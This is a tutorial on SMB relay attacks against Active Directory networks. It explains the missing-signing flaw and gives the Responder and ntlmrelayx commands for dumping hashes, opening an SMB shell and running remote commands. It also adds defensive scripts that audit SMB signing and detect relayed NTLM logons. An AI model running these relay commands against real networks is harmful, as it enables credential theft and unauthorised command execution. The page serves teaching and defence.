
SMB Relay (Internal/External)

Note: Network Environment

This attack works best in a flat network. However, as long as the attacker machine and target(s) are routable to each other and no firewalls block the required ports (445/tcp for SMB), it can also work across network segments.

What is SMB Relay?

A man-in-the-middle may receive user NTLM authentication credentials, which, once received, can be relayed to other host(s) on the network in an attempt to authenticate as said user(s).

What's the Flaw?

Many Active Directory networks are configured in such a way that SMB message signing is not enabled -- which is the default configuration on client machines. It is always enabled on servers and domain controllers.

Detecting SMB Signing Mode

sudo nmap --script=smb2-security-mode -p445 <targets>
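The nmap output above has to be read host by host to find the machines that accept unsigned SMB. The following Python script is an added example (not part of the original page or of nmap) that parses the normal-format output of the smb2-security-mode script and lists the hosts whose signing state is anything other than "enabled and required". The scan output embedded in it is a constructed sample in nmap's layout, not a real scan; the hostnames and addresses in it are made up.

```python
"""Audit `nmap --script=smb2-security-mode -p445` output for hosts that do not require SMB signing."""
import re
from typing import Dict, List

# Constructed sample of nmap normal output (not real scan data): one host with signing
# enabled but not required, one domain controller requiring it, one host with 445 closed.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for dc01.example.local (10.0.0.10)
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.0.0.7
Host is up (0.0015s latency).

PORT    STATE SERVICE
445/tcp closed microsoft-ds
"""

# "Nmap scan report for name (ip)" or "Nmap scan report for ip"
HOST_RE = re.compile(r"^Nmap scan report for (?:(?P<name>\S+) \((?P<ip>[\d.]+)\)|(?P<ip2>\S+))$")
# The script prints one line per host such as "Message signing enabled but not required"
SIGNING_RE = re.compile(r"Message signing (?P<state>.+)$")


def parse_signing_modes(output: str) -> Dict[str, str]:
    """Map each scanned host (by IP) to the signing state nmap reported.

    Hosts with port 445 closed, or with no script output, are mapped to "unknown".
    """
    modes: Dict[str, str] = {}
    current = None
    for line in output.splitlines():
        m = HOST_RE.match(line.strip())
        if m:
            current = m.group("ip") or m.group("ip2")
            modes[current] = "unknown"
            continue
        if current is None:
            continue
        s = SIGNING_RE.search(line)
        if s:
            modes[current] = s.group("state").strip()
    return modes


def hosts_not_requiring_signing(output: str) -> List[str]:
    """Return hosts whose SMB2 signing state is anything other than 'enabled and required'.

    Those hosts would accept a relayed, unsigned session, so they are the ones to fix
    (RequireSecuritySignature) or to monitor more closely.
    """
    return sorted(ip for ip, state in parse_signing_modes(output).items()
                  if state != "unknown" and "and required" not in state)


if __name__ == "__main__":
    for ip, state in parse_signing_modes(SAMPLE_NMAP_OUTPUT).items():
        print(f"{ip:15} {state}")
    print("not requiring signing:", hosts_not_requiring_signing(SAMPLE_NMAP_OUTPUT))
```

Hosts that report "unknown" are not safe by default; they simply could not be assessed (port closed or filtered) and should be scanned again from a vantage point that can reach them.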

How is it Exploited?

Using a tool like Responder, the attacker can listen for SMB client requests. If a client connects, the attacker receives the user's NTLMv2 authentication credential -- username and NTLMv2 hash in cleartext.

Upon receiving the NTLMv2 authentication credential, the attacker can use a tool like ntlmrelayx to relay that credential to other host(s) on the network and attempt to authenticate as this user -- assuming this user is privileged to access resources on the other machines.
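From the target's side, a relayed logon looks like a normal NTLM network logon (Security event 4624, logon type 3) except that the WorkstationName field still names the victim's machine while the connection actually comes from the relaying host's IP address. The Python below is an added example (not from the original page or from any of the tools named on it) of a detection rule built on that mismatch: it checks each NTLM network logon against an asset inventory and then groups the suspects by source address, since one source reaching several targets matches relaying against a target list. The event records and the inventory are constructed samples; the field names follow the EventData names of event 4624, but the hostnames and addresses are made up.

```python
"""Flag NTLM network logons whose source IP does not belong to the workstation named in the logon."""
from collections import defaultdict
from typing import Dict, Iterable, List, Set

# Constructed asset inventory (hypothetical): workstation name -> expected IPv4 address.
INVENTORY: Dict[str, str] = {
    "WS-JSMITH": "10.0.0.50",
    "WS-ALICE": "10.0.0.51",
}

# Constructed Security log entries; keys mirror the EventData names of Windows event 4624.
SAMPLE_EVENTS: List[dict] = [
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "TargetUserName": "jsmith", "WorkstationName": "WS-JSMITH",
     "IpAddress": "10.0.0.50"},   # genuine logon from jsmith's own workstation
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "TargetUserName": "jsmith", "WorkstationName": "WS-JSMITH",
     "IpAddress": "10.0.0.99"},   # same workstation name, different source: relay suspect
    {"EventID": 4624, "Computer": "FS02", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "TargetUserName": "jsmith", "WorkstationName": "WS-JSMITH",
     "IpAddress": "10.0.0.99"},   # the same credential reaching a second target
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "LmPackageName": "-", "TargetUserName": "alice", "WorkstationName": "WS-ALICE",
     "IpAddress": "10.0.0.51"},   # Kerberos logon: not relayable this way, ignored
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "TargetUserName": "svc_backup", "WorkstationName": "-",
     "IpAddress": "10.0.0.60"},   # no workstation name (e.g. non-Windows client): cannot be judged
]


def is_ntlm_network_logon(event: dict) -> bool:
    """True for successful network (type 3) logons that used NTLM."""
    return (event.get("EventID") == 4624
            and event.get("LogonType") == 3
            and event.get("AuthenticationPackageName") == "NTLM")


def find_relay_suspects(events: Iterable[dict], inventory: Dict[str, str]) -> List[dict]:
    """Return NTLM network logons whose IpAddress differs from the inventory address of WorkstationName."""
    suspects: List[dict] = []
    for ev in events:
        if not is_ntlm_network_logon(ev):
            continue
        ws = ev.get("WorkstationName", "-")
        src = ev.get("IpAddress", "-")
        # Missing or loopback addresses and missing workstation names give the rule nothing to compare.
        if ws in ("-", "") or src in ("-", "", "127.0.0.1", "::1"):
            continue
        expected = inventory.get(ws)
        # Unknown workstation: leave it to a separate "unknown host" rule rather than guess.
        if expected is None or expected == src:
            continue
        suspects.append({**ev, "ExpectedIp": expected})
    return suspects


def fan_out_by_source(suspects: Iterable[dict]) -> Dict[str, Set[str]]:
    """Group suspect logons by source IP; one source reaching many targets is the relay pattern."""
    targets: Dict[str, Set[str]] = defaultdict(set)
    for ev in suspects:
        targets[ev["IpAddress"]].add(ev["Computer"])
    return dict(targets)


if __name__ == "__main__":
    hits = find_relay_suspects(SAMPLE_EVENTS, INVENTORY)
    for ev in hits:
        print(f"{ev['TargetUserName']} from {ev['IpAddress']} (expected {ev['ExpectedIp']}) -> {ev['Computer']}")
    for src, reached in fan_out_by_source(hits).items():
        print(f"{src} reached {len(reached)} target(s): {sorted(reached)}")
```

The name-versus-address comparison is a heuristic, not proof: DHCP churn, VPN clients and stale inventory all produce mismatches, so in practice the rule is tuned against a recent inventory and the fan-out count is what raises the priority. It also only fires on the targets that accepted the relayed session, which is one more reason to pair it with the signing audit above and require signing wherever possible.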

The Attack

Part 1: Responder

Various Responder modules can be enabled/disabled in the configuration file: /etc/responder/Responder.conf

  • Disable the HTTP server (ntlmrelayx hosts this instead)
  • Disable the SMB server (ntlmrelayx hosts this instead)

sudo responder -I <interface-name> -dvw

Part 2a: ntlmrelayx (dump hashes)

sudo ntlmrelayx.py -tf <targets-file> -smb2support

Part 2b: ntlmrelayx (bind shell)

Opens an SMB shell that is forwarded through a socket on localhost

sudo ntlmrelayx.py -tf <targets-file> -smb2support -i

Once the shell is established, just use netcat to connect to the localhost socket (ntlmrelayx prints the port it bound)

nc 127.0.0.1 <port>

Then, we can issue commands to the SMB shell established on the target

Part 2c: ntlmrelayx (RCE)

sudo ntlmrelayx.py -tf <targets-file> -smb2support -c 'command'